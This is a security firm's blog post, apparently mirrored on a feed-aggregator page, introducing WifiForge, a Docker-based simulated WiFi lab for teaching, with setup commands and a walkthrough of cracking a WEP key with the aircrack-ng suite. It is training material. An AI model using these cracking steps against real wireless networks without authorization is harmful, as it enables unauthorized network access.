惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

A
About on SuperTechFans
D
DataBreaches.Net
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
V
Visual Studio Blog
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
B
Blog RSS Feed
Recent Announcements
Recent Announcements
The Register - Security
The Register - Security
S
Secure Thoughts
Y
Y Combinator Blog
The Last Watchdog
The Last Watchdog
L
LINUX DO - 最新话题
V2EX - 技术
V2EX - 技术
腾讯CDC
GbyAI
GbyAI
G
Google Developers Blog
博客园 - 司徒正美
博客园 - 三生石上(FineUI控件)
T
The Exploit Database - CXSecurity.com
T
Threat Research - Cisco Blogs
P
Proofpoint News Feed
Schneier on Security
Schneier on Security
Microsoft Security Blog
Microsoft Security Blog
Jina AI
Jina AI
WordPress大学
WordPress大学
aimingoo的专栏
aimingoo的专栏
MyScale Blog
MyScale Blog
Help Net Security
Help Net Security
K
Kaspersky official blog
P
Privacy & Cybersecurity Law Blog
www.infosecurity-magazine.com
www.infosecurity-magazine.com
AI
AI
MongoDB | Blog
MongoDB | Blog
Scott Helme
Scott Helme
J
Java Code Geeks
Engineering at Meta
Engineering at Meta
H
Heimdal Security Blog
H
Help Net Security
D
Darknet – Hacking Tools, Hacker News & Cyber Security
云风的 BLOG
云风的 BLOG
Microsoft Azure Blog
Microsoft Azure Blog
S
Security Affairs
TaoSecurity Blog
TaoSecurity Blog
The GitHub Blog
The GitHub Blog
Hacker News: Ask HN
Hacker News: Ask HN
Martin Fowler
Martin Fowler
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
Project Zero
Project Zero
T
The Blog of Author Tim Ferriss
Last Week in AI
Last Week in AI

Black Hills Information Security, Inc.

Bad Habits: An ANTISOC Operation Same Problem, Different Angles: When Red Team and Blue Team Actually Talk to Each Other How to Identify and Exploit New Vulnerabilities Swapper – A Pure Regex Match/Replace Burp Extension A Practical Guide to BloodHound Data Collection Network Engineering Basics Signed, Trusted, and Abused: Proxy Execution via WebView2 Getting Started In Pentesting – Advice From The BHIS Pentest Lead Cloud Security: Tips and Resources for Securing the Cloud Lessons From A Chatbot Incident How to Lead Effective Tabletops Understanding GRC: How to Navigate Risks and Compliance Standards The “P” in PAM is for Persistence: Linux Persistence Technique Malware Analysis: How to Analyze and Understand Malware OSINT: How to Find, Use, and Control Open-Source Intelligence What to Do with Your First Home Lab When the SOC Goes to Deadwood: A Night to Remember Social Engineering and Microsoft SSPR: The Road to Pwnage is Paved with Good Intentions Common Cyber Threats Finding the Right Penetration Testing Company Deceptive-Auditing: An Active Directory Honeypots Tool The Curious Case of the Comburglar How to Set Smart Goals (That Actually Work For You) Inside the BHIS SOC: A Conversation with Hayden Covington Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation Why You Got Hacked – 2025 Super Edition Abusing Delegation with Impacket (Part 2): Constrained Delegation Abusing Delegation with Impacket (Part 1): Unconstrained Delegation GoSpoof – Turning Attacks into Intel Model Context Protocol (MCP) Bypassing WAFs Using Oversized Requests Getting Started with AI Hacking Part 2: Prompt Injection Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2) DomCat: A Domain Categorization Tool Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1) Microsoft Store and WinGet: Security Risks for Corporate Environments Default Web Content MailFail Commonly Abused Administrative Utilities: A Hidden Risk to Enterprise Security Stop Spoofing Yourself! Disabling M365 Direct Send Bypassing CSP with JSONP: Introducing JSONPeek and CSP B Gone Offensive Tooling Cheatsheets: An Infosec Survival Guide Resource DNS Triage Cheatsheet GraphRunner Cheatsheet Burp Suite Cheatsheet Impacket Cheatsheet Wireshark Cheatsheet Hashcat Cheatsheet EyeWitness Cheatsheet Nmap Cheatsheet Netcat (nc) Cheatsheet Hunt for Weak Spots in Your Wireless Network with Airodump-ng from the Aircrack-ng Suite Detecting ADCS Privilege Escalation Vulnerability Scanning with Nmap Getting Started with NetExec: Streamlining Network Discovery and Access How to Use Dirsearch Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 3: Arcanum Cyber Security Bot How to Design and Execute Effective Social Engineering Attacks by Phone Abusing S4U2Self for Active Directory Pivoting Why Use a Macro Pad? Espanso: Text Replacement, the Easy Way Caging Copilot: Lessons Learned in LLM Security Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 2: Copilot Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 1: Burpference Intercepting Traffic for Mobile Applications that Bypass the System Proxy How to Root Android Phones Communicating Security to the C-Suite: A Strategic Approach Offline Memory Forensics With Volatility Getting Started with AI Hacking: Part 1 Go-Spoof: A Tool for Cyber Deception How to Test Adversary-in-the-Middle Without Hacking Tools Canary in the Code: Alert()-ing on XSS Exploits How to Hack Wi-Fi with No Wi-Fi Why Your Org Needs a Penetration Test Program Burp Suite Extension: Copy For Light at the End of the Dark Web Wi-Fi Forge: Practice Wi-Fi Security Without Hardware Avoiding Dirty RAGs: Retrieval-Augmented Generation with Ollama and LangChain Gone Phishing: Installing GoPhish and Creating a Campaign 5 Things We Are Going to Continue to Ignore in 2025 John Strand’s 5 Phase Plan For Starting in Computer Security Questions From a Beginner Threat Hunter GRC for Security Managers: From Checklists to Influence AI Large Language Models and Supervised Fine Tuning Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan One Active Directory Account Can Be Your Best Early Warning Introduction to Zeek Log Analysis Indecent Exposure: Your Secrets are Showing Creating Burp Extensions: A Beginner’s Guide Pitting AI Against AI: Using PyRIT to Assess Large Language Models (LLMs) The Top Ten List of Why You Got Hacked This Year (2023/2024) ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & Breaches Intro to Data Analytics Using SQL Finding Access Control Vulnerabilities with Autorize The Detection Engineering Process Cyber Risk Lessons We Can Learn From Hurricane Preparedness Intro to Desktop Application Testing Methodology What Is Penetration Testing? Adversary in the Middle (AitM): Post-Exploitation Pentesting, Threat Hunting, and SOC: An Overview
WifiForge – WiFi Exploitation for the Classroom
BHIS · 2024-08-01 · via Black Hills Information Security, Inc.

by William Oldert // BHIS Intern

BHIS had a problem.  

We needed an environment for students to learn WiFi hacking safely. Our original solution used interconnected physical network gear and computers to create the needed signals. The requirement for multiple such setups to properly run a class with was costly, however, and transport was a concern as well.  

We discovered a program called Mininet, which creates an interactive virtual network, and began looking for ways to utilize it in labs and teaching material. Wondering if this might be the solution we were in sore need of, a project was started, and a team of interns was hired to research and test the limits. 

The product of that project is WifiForge. 

What is WifiForge? 

WifiForge is a program built on the foundation of the open-source Mininet-Wifi, itself being a branch from Mininet that includes support for wireless networking. It automatically sets up the network and tools needed to perform a variety of exploits, all packed neatly into a Docker container. WifiForge eliminates the need for physical hardware, requiring only a docker install and the execution of a couple commands. 

You can find a link to the project’s GitHub page HERE.  

Disclaimer/Notes 

  • While it is strongly recommended to run WifiForge in a Docker container, you can run it on your base machine. 
  • Installing Mininet-Wifi on the base machine has been known to cause dependency nightmares. 
  • It is suggested to run WifiForge on Ubuntu version 14.04 and up or the latest version of Kali (when Mininet was built in 2017, Ubuntu 14.04 was bleeding edge).  
  • The WifiForge installation script may disrupt normal operating system use; it is suggested to use a fresh install, virtual machine, or preferably a Docker container. 

OS Compatibility 

WifiForge should work on any Linux operating system using Docker. The following operating systems have been tested and are confirmed to work. 

Kali Linux 

Parrot OS 

Ubuntu 

Set-Up Guide 

Below is the guide to setting up a Docker container with all the required pieces and parts. We have guides for installing to a bare OS or from a Docker image. These instructions can be found on the project’s GitHub. The best and easiest option, however, is laid out below. 

Docker (recommended) 

Note: Dockerfile will fail if Mininet-Wifi is already installed locally 

Install from release 

  1. Pull the Docker image from Dockerhub and start a new container 
sudo docker run --privileged=true -it --env="DISPLAY" --env="QT_X11_NO_MITSHM=1" -v /tmp/.X11-unix:/tmp/.X11-unix:rw -v /sys/:/sys -v /lib/modules/:/lib/modules/ --name mininet-wifi --network=host --hostname mininet-wifi redblackbird/wififorge:v1.0.0 /bin/bash

Within the container, initiate the controller to simulate APs

service openvswitch-switch start

Run WifiForge.py

sudo python3 Framework/WifiForge.py

Labs and Featured Tools

WifiForge provides pre-built labs that cover a variety of topics and tools including, but not limited, to:

Today, however, we would like to give you a taste of what this program can do through our WEP key-cracking lab.

Lab: WEP Key Cracking

Setup Phase

To begin, select “WEP Network” from the WifiForge menu and allow up to 30 seconds for initialization of the network.

Once it has started, use the following command to open an xterm session on the attacker, host1, and host2.

xterm a host1 host2 
WEP Key Cracking

On the attacking machine, switch the interface to monitor mode using the following command.

airmon-ng start a-wlan0 

Successful output of the above command will appear as below.

Use airodump-ng to begin looking for nearby networks.

airodump-ng a-wlan0mon 

Wait for traffic to appear on the console as seen below.

Note the BSSID and channel before killing the process with ‘Ctrl + c’. Use this BSSID and channel in the next command.

airodump-ng –c <CHANNEL> -–bssid <BSSID> a-wlan0mon –w attack_capture 

As the above command runs, information regarding hosts connected to the target network will appear as seen below.

On host1, note the IP address associated with host1-wlan0 after running the following command.

ifconfig

The IP address can be seen highlighted in red in the screenshot below.

The WEP key will be cracked by collecting [JD1] regular user traffic. To simulate this traffic, use the following command on host1.

iperf –s

The above command will begin listening on port 5001 for traffic, as seen below.

Switch over to host2’s terminal. Run the following command.

iperf -c <HOST1 IP ADDRESS> -u -b 100M -t 60

The above command will begin sending traffic to host1. The output will be similar to the image below.

Wait until about 25,000 packets have been sent (see the Frames column in the airmon console). When this number is reached, kill the airmon-ng session on the attacker machine using ‘Ctrl + c’ and run the following command.

aircrack-ng ./attack_capture-01.cap

The above command will begin attempting to crack the WEP key. Successful decryption will be similar to the screenshot below.

To Close…

Hopefully, this lab helped to demonstrate the usefulness of WifiForge to the reader and showcase what it can be used to accomplish. Being able to spin up an environment for a class, without having to deal with the set up or any of the behind-the-scenes work, is why we built this program. Not having to dink around with hardware is a big plus too. All this in a compact Docker container means portability and scaling are not a problem either.

And, of course, WifiForge, as intended, solves BHIS’s problem quite handily.

Links and Further Reading



Ready to learn more?

Level up your skills with affordable classes from Antisyphon!

Pay-What-You-Can Training

Available live/virtual and on-demand